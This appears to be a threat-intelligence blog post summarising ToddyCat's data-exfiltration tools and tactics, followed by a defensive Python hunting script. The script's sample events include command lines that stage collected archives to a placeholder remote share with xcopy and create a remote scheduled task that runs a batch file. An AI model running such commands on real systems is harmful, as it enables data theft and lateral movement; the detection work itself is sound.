October 13, 2023 at 08:30AM
The APT actor ToddyCat has been linked to new malicious tools used for data exfiltration, providing insight into their tactics. Kaspersky discovered the group last year, connecting it to attacks on high-profile entities in Europe and Asia. The tools include loaders, a Trojan, a file collection tool, a Dropbox uploader, and an exfiltration tool. ToddyCat also uses custom scripts and compromised credentials for espionage activities. This disclosure coincides with Check Point’s report on a separate campaign targeting government and telecom entities in Asia, which shares infrastructure with ToddyCat.
Key takeaways from the meeting notes:
– ToddyCat, an advanced persistent threat (APT) actor, has been linked to a new set of malicious tools designed for data exfiltration.
– Kaspersky first revealed ToddyCat last year and connected the group to attacks against high-profile entities in Europe and Asia over a three-year period.
– In addition to the previously identified Ninja Trojan and Samurai backdoor, ToddyCat has developed and maintained other software for persistence, file operations, and loading additional payloads.
– The new tools include loaders to launch Ninja Trojan, LoFiSe to find and collect files, a Dropbox uploader for saving stolen data, and Pcexter for exfiltrating archive files to OneDrive.
– ToddyCat also uses custom scripts for data collection, a passive backdoor that receives commands via UDP packets, Cobalt Strike for post-exploitation, and compromised domain admin credentials for lateral movement.
– The actor sometimes executes scripts on remote hosts using remote task execution and manually transfers collected files to exfiltration hosts via the xcopy utility.
– Check Point recently discovered an ongoing campaign targeting government and telecom entities in Asia using “disposable” malware. The infrastructure used in this campaign overlaps with ToddyCat’s infrastructure.
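The remote task execution and xcopy staging described above leave traces in process-creation telemetry. As an added example that is not from the page or from Kaspersky's report, the Python below applies two hunting rules to constructed Sysmon-style events: xcopy whose destination is a UNC path, and schtasks /Create aimed at another host via /S. Hostnames, users and the IP address are assumed placeholders.

```python
import re
import shlex
from typing import Dict, List, Optional

# Constructed process-creation events in an EDR/Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "user": "CORP\\da-admin", "image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy C:\Users\Public\coll\*.zip \\10.0.0.5\share\out /E /H /Y"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy C:\Projects\build D:\backup\build /E"},
    {"host": "WS02", "user": "CORP\\da-admin", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /Create /S WS07 /TN upd /TR "cmd /c C:\temp\c.bat" /SC ONCE /ST 23:00'},
    {"host": "WS03", "user": "CORP\\svc-backup", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /Query /TN backup"},
]

UNC_PATH = re.compile(r"^\\\\[\w.-]+\\")  # \\host\share\...

def xcopy_to_unc(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Flag xcopy whose destination (second non-switch argument) is a UNC path."""
    if not ev["image"].lower().endswith("\\xcopy.exe"):
        return None
    # posix=False keeps Windows backslashes intact and does not treat them as escapes
    args = [a for a in shlex.split(ev["cmdline"], posix=False)[1:] if not a.startswith("/")]
    if len(args) >= 2 and UNC_PATH.match(args[1]):
        return {"rule": "xcopy_to_unc", "host": ev["host"], "user": ev["user"], "target": args[1]}
    return None

def remote_task_create(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Flag schtasks /Create that targets another machine through /S <host>."""
    if not ev["image"].lower().endswith("\\schtasks.exe"):
        return None
    toks = shlex.split(ev["cmdline"], posix=False)
    low = [t.lower() for t in toks]
    if "/create" in low and "/s" in low:
        i = low.index("/s")
        if i + 1 < len(toks):
            return {"rule": "remote_task_create", "host": ev["host"], "user": ev["user"], "target": toks[i + 1]}
    return None

RULES = (xcopy_to_unc, remote_task_create)

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event and return the findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev))]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Both rules are coarse hunting queries meant to be tuned against a baseline: legitimate backup jobs also xcopy to file shares, so the value is in correlating the findings with the account used (here a domain admin) and the hosts involved.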